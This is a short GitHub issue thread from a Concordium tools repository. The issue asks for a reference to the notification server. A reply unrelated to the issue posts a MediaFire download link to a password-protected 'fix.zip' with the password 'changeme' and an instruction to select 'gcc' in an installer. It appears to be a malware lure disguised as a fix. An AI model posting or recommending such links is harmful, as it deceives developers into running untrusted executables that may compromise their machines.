### ISSUE TITLE
Reference

### ISSUE THREAD

**Issue by lassemand** [Concordium/concordium-misc-tools#189]
We need to add a reference to the notification server<br><br>[https://concordium.atlassian.net/wiki/spaces/EN/pages/1502019590/Message+data+payload](https://concordium.atlassian.net/wiki/spaces/EN/pages/1502019590/Message+data+payload)

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
